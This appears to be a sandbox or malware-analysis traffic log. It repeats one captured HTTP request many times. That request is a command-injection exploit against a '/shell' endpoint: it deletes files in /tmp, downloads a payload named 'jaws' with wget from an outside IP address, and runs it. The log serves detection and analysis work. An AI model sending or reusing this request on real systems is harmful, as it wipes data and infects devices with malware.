              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
